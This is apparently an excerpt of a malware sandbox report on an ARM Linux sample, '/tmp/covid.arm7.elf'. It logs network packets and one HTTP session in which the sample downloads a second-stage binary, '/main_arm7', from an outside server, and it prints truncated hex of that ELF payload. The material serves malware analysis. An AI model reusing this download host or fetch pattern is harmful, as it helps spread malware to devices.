    Jan 6, 2025 16:32:57.497028112 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.497040987 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.497104883 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.497641087 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.497883081 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.497895956 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.497908115 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.498027086 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.498039961 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.498053074 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.498785973 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.498796940 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.499443054 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.713203907 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.717699051 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718024015 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718086958 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718101025 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718239069 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718252897 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718266964 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718286037 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718297958 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718576908 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718611956 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718622923 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718666077 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.718710899 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718723059 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718734026 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718839884 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.718851089 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.720504999 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.723447084 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.723467112 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.723478079 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.724128008 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:57.941647053 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:57.982832909 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.061908007 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.066696882 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066720009 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066731930 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066855907 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066868067 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066879988 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066890955 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.066971064 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.067013025 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067089081 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067157984 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067204952 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067217112 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067228079 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067349911 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.067399979 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.069288969 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.071758986 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.071772099 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.073947906 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.297658920 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.338784933 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.389018059 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.393824100 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.393886089 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.393898964 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.394308090 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.394378901 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.394396067 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.395252943 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.395307064 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.395323038 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.395653963 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.396235943 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.396292925 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.396305084 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.397183895 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.397229910 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.397247076 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.398128986 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.400388956 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.400413990 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.403017998 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.629673958 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.670778036 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.901640892 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.901694059 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.913083076 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.918720961 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.918775082 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.918790102 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.918802023 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.919137955 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.919148922 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.919162035 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.919832945 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.919891119 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.919903040 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.920243979 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.920612097 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.920664072 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.920679092 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.921391010 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.921453953 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.921464920 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.922573090 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.923566103 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.924990892 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.925024033 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.927197933 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:58.927386045 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.927397013 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:58.929507971 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.150363922 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.183051109 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.187892914 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.187921047 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.188313007 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.188333035 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.189076900 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.189096928 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.189886093 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.189907074 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.190133095 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.194866896 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.194902897 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.197001934 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.421694994 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.421745062 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.519273043 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.524055958 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.524075031 CET8040906185.255.135.104192.168.2.15
    Jan 6, 2025 16:32:59.524101973 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:32:59.566754103 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:33:00.528912067 CET4090680192.168.2.15185.255.135.104
    Jan 6, 2025 16:33:00.533709049 CET8040906185.255.135.104192.168.2.15
    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.2.1540906185.255.135.10480
    TimestampBytes transferredDirectionData
    Jan 6, 2025 16:32:56.551326990 CET46OUTGET /main_arm7 HTTP/1.0
    Data Raw: 00 44 6f 77 6e 6c 6f
    Data Ascii: Downlo
    Jan 6, 2025 16:32:57.258852959 CET1236INHTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 15:32:57 GMT
    Server: Apache/2.4.6 (CentOS)
    Last-Modified: Thu, 02 Jan 2025 08:25:43 GMT
    ETag: "2be8a-62ab4e87cfb85"
    Accept-Ranges: bytes
    Content-Length: 179850
    Connection: close
    Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 94 81 00 00 34 00 00 00 80 1b 02 00 02 00 00 04 34 00 20 00 05 00 28 00 1e 00 1b 00 01 00 00 70 d8 90 01 00 d8 10 02 00 d8 10 02 00 70 01 00 00 70 01 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 48 92 01 00 48 92 01 00 05 00 00 00 00 80 00 00 01 00 00 00 48 92 01 00 48 92 02 00 48 92 02 00 e0 03 00 00 64 66 00 00 06 00 00 00 00 80 00 00 07 00 00 00 4c 92 01 00 4c 92 02 00 4c 92 02 00 04 00 00 00 0c 00 00 00 04 00 00 00 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 28 96 02 00 00 00 00 00 48 92 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff [TRUNCATED]
    Data Ascii: ELF(44 (pppHHHHHdfLLLQtd-L@-,@0S 0S/00@/(H-@0SM88/00S$0S//H,X ---0MC-8M> 0/p/E-MEG-`p p00PPP0UG/0p@P..EE|0Qp0 0S0SP}E $0/DH0@-XPM@H0 @TP.0 @T0@/LP@-@0S0R
    Jan 6, 2025 16:32:57.258868933 CET248INData Raw: e0 8e e2 00 00 5e e1 0c 10 a0 e1 f7 ff ff 1a 04 00 a0 e1 10 40 bd e8 1e ff 2f e1 00 30 91 e5 00 00 53 e3 0a 00 a0 13 f9 ff ff 1a f7 ff ff ea 00 00 50 e3 10 40 2d e9 03 40 a0 e1 0d 00 00 0a 04 30 d1 e5 02 00 53 e1 08 c0 81 12 00 e0 a0 13 04 00 00
    Data Ascii: ^@/0SP@-@0S0RP@/P!<@QG-@PG/!< 4,4<\00
    Jan 6, 2025 16:32:57.258882999 CET1236INData Raw: 00 5c e3 04 30 c5 e5 ee ff ff 0a 05 00 d4 e5 00 00 50 e3 05 00 c5 e5 ea ff ff 0a 00 31 a0 e1 06 70 4c e2 00 30 83 e0 03 00 57 e1 e5 ff ff 3a 18 10 a0 e3 6f 40 00 eb 00 00 50 e3 00 10 a0 e1 08 00 85 e5 df ff ff 0a 05 30 d5 e5 00 00 53 e3 06 60 84
    Data Ascii: \0P1pL0W:o@P0S` 0P0 00000S`pGW=PG@P0S W
    Jan 6, 2025 16:32:57.258892059 CET248INData Raw: 50 a0 e1 08 70 a0 e3 08 10 81 e0 00 00 96 e5 00 30 85 e5 04 70 c5 e5 01 11 a0 e1 93 3f 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 07 10 a0 e1 08 30 83 e0 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 3a 3f 00 eb 00 10 d4 e5 6c 20 9f e5 00 50 a0 e1 0a 30 a0
    Data Ascii: Pp0p?0 Q00 :?l P0 0?0Q A/DHT4\PXl\O-M@Pp?$
    Jan 6, 2025 16:32:57.259206057 CET1236INData Raw: 30 a0 e3 04 00 a0 e1 46 fe ff eb 01 38 a0 e3 00 c0 a0 e1 ff c0 0c e2 01 30 43 e2 03 20 a0 e3 05 10 a0 e1 04 00 a0 e1 4c c0 8d e5 3d fe ff eb 05 10 a0 e1 04 20 a0 e3 40 30 a0 e3 00 90 a0 e1 04 00 a0 e1 37 fe ff eb 00 c0 a0 e1 ff c0 0c e2 05 10 a0
    Data Ascii: 0F80C L= @07 0T/80C X&80C `80C 8(0C , 0
    Jan 6, 2025 16:32:57.259217978 CET1236INData Raw: 40 44 e2 04 00 51 e1 53 00 00 0a 5c 20 9d e5 04 00 52 e1 55 00 00 0a 60 30 9d e5 04 00 53 e1 57 00 00 0a 28 c0 9d e5 04 00 5c e1 59 00 00 0a 2c 00 9d e5 04 00 50 e1 5b 00 00 0a 6c 10 9d e5 00 00 51 e3 5d 00 00 1a 00 20 a0 e3 ba 20 c5 e1 14 10 a0
    Data Ascii: @DQS\ RU`0SW(\Y,P[lQ] x01 0|0N``9H y:|0P|0W|0@|0A
    Jan 6, 2025 16:32:57.259231091 CET1236INData Raw: 30 c4 e5 40 30 a0 13 54 50 9d e5 b6 30 c4 11 2f 30 a0 e3 09 30 c4 e5 14 20 84 e2 08 30 a0 e3 b4 50 c4 e1 b2 80 c4 e1 b2 30 c2 e1 20 30 9d e5 18 20 d4 e5 0c 30 84 e5 b0 20 c2 e3 40 20 82 e3 09 10 81 e0 10 10 91 e5 18 20 c4 e5 18 30 d4 e5 0a 30 c3
    Data Ascii: 0@0TP0/00 0P0 0 0 @ 0000(P P0, 0@ 0 0D;@Q0000\0,`L @H0Tp 0\@<@<P@@
    Jan 6, 2025 16:32:57.259278059 CET1236INData Raw: 30 a0 e3 00 90 a0 e1 04 00 a0 e1 af fa ff eb 05 10 a0 e1 10 20 a0 e3 00 30 a0 e3 00 a0 a0 e1 04 00 a0 e1 a9 fa ff eb 4c 25 9f e5 05 10 a0 e1 00 30 92 e5 00 60 a0 e1 19 20 a0 e3 04 00 a0 e1 bc fa ff eb 03 10 a0 e3 70 00 8d e5 06 20 a0 e3 02 00 a0
    Data Ascii: 0 0L%0` p a8pB0 # D8p64H<0 (X H X$8% Wd0hl @0d<#8h0
    Jan 6, 2025 16:32:57.259290934 CET1236INData Raw: 3c 83 e1 70 20 9d e5 01 00 72 e3 10 30 85 e5 ad ff ff 1a 46 0d 00 eb 01 48 a0 e3 58 30 9d e5 01 40 44 e2 04 00 53 e1 0c 00 85 e5 ab ff ff 1a 3f 0d 00 eb 64 10 9d e5 04 00 51 e1 b4 00 c5 e1 a9 ff ff 1a 3a 0d 00 eb 68 20 9d e5 04 00 52 e1 b4 01 c5
    Data Ascii: <p r0FHX0@DS?dQ:h R5@0S0DQ+l R&CO/O-M@Pp:$ 0E8
    Jan 6, 2025 16:32:57.259303093 CET1236INData Raw: 30 d4 e5 10 c0 9d e5 04 30 c3 e3 0c 31 83 e1 0d 30 c4 e5 0d 20 d4 e5 14 00 9d e5 02 20 c2 e3 80 20 82 e1 0d 20 c4 e5 0d 30 d4 e5 18 10 9d e5 01 30 c3 e3 03 30 81 e1 0d 30 c4 e5 0a 0c 00 eb 64 20 9d e5 00 00 52 e3 0d 30 d4 15 08 30 83 13 be 00 c4
    Data Ascii: 0010 0000d R00h(02|0@T|@h0('4#8"0W|021C0$ QR`<ppQHP@DQS\
    Jan 6, 2025 16:32:57.263983965 CET1236INData Raw: c0 a0 e3 00 10 a0 e3 02 20 82 e2 00 c0 8d e5 ca 34 00 eb 01 00 70 e3 2c 01 00 0a 24 10 9d e5 00 20 a0 e3 01 08 a0 e1 0b 48 a0 e1 06 58 a0 e1 6c 20 8d e5 30 20 9d e5 20 38 a0 e1 24 68 a0 e1 25 18 a0 e1 00 00 57 e3 4c 30 8d e5 58 60 8d e5 5c 10 8d
    Data Ascii: 4p,$ HXl 0 8$h%WL0X`\(0<L`,! .0#8"($l%\8 @ 0d 0 @


    System Behavior

    Start time (UTC):15:32:55
    Start date (UTC):06/01/2025
    Path:/tmp/covid.arm7.elf
    Arguments:/tmp/covid.arm7.elf
    File size:4956856 bytes
    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1